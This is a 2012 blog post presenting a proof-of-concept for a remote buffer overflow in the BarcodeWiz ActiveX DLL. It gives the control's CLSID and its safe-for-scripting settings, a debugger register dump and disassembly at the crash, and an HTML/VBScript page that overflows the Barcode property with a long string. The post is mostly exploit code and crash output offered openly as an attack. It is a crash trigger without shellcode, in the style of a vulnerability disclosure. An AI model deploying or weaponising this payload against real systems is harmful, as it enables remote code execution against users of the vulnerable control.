Kypto

Kypto
Selling Your Soul To The Devil Can Be Bad.

Monday 13 August 2012

BarcodeWiz.dll remote Buffer Overflow PoC

  1. Exploit Title: BarcodeWiz.dll remote Buffer Overflow PoC
  2. Date: July 25, 2012
  3. Author: Kypto  
  4. Kypto@programmer.net
  5. Https://twitter.com/ddos101
  6. Version: 4.0.0.0
  7. Tested on: windows 7 SP2
  8. ==========================================================================
  9. Class BarCodeWiz
  10. GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
  11. Number of Interfaces: 1
  12. Default Interface: IWiz
  13. RegKey Safe for Script: True
  14. RegkeySafe for Init: True
  15. KillBitSet: False
  16. Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
  17. RegKey Safe for Script: True
  18. RegKey Safe for Init: True
  19. Implements IObjectSafety: True
  20. IDisp Safe:  Safe for untrusted: caller,data  
  21. IPersist Safe:  Safe for untrusted: caller,data  
  22. IPStorage Safe:  Safe for untrusted: caller,data  
  23. --------------------------------------------------------------------------
  24. Registers:
  25. --------------------------------------------------------------------------
  26. EIP 023F8D42
  27. EAX 00000021
  28. EBX 00000ADD
  29. ECX 025A2F58 -> 02439F8C
  30. EDX 00000001
  31. EDI 0046D48C -> 00000068
  32. ESI 025A2F58 -> 02439F8C
  33. EBP 0046D47C -> 0046E48C
  34. ESP 0046D464 -> 025A0AA8
  35. Block Disassembly:
  36. ----------------------------------------------------------------------------
  37. 23F8D33 INC EBX
  38. 23F8D34 MOV [EBP+8],ECX
  39. 23F8D37 PUSH ECX
  40. 23F8D38 PUSH DWORD PTR [EBP-8]
  41. 23F8D3B MOV ECX,ESI
  42. 23F8D3D CALL 023F837E
  43. 23F8D42 MOV [EDI+EBX*4],EAX       <--- CRASH
  44. 23F8D45 INC EBX
  45. 23F8D46 DEC DWORD PTR [EBP-4]
  46. 23F8D49 MOV EAX,[EBP-4]
  47. 23F8D4C CMP EAX,[EBP-C]
  48. 23F8D4F JL 023F8C80
  49. 23F8D55 JMP 023F8ECE
  50. 23F8D5A MOV EAX,[ESI]
  51. 23F8D5C PUSH EBX
  52. ArgDump:
  53. --------------------------------------------------
  54. EBP+8   00000006
  55. EBP+12  025A2F58 -> 02439F8C
  56. EBP+16  00000068
  57. EBP+20  00000021
  58. EBP+24  00000021
  59. EBP+28  00000021
  60. ============================================================================
  61. <html>
  62. Exploit
  63. <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object>
  64. <script language='vbscript'>
  65. targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll"
  66. prototype  = "Property Let Barcode As String"
  67. memberName = "Barcode"
  68. progid     = "BARCODEWIZLib.BarCodeWiz"
  69. argCount   = 1
  70. arg1=String(14356, "A")
  71. poc.Barcode = arg1
  72. </script>

No comments:

Post a Comment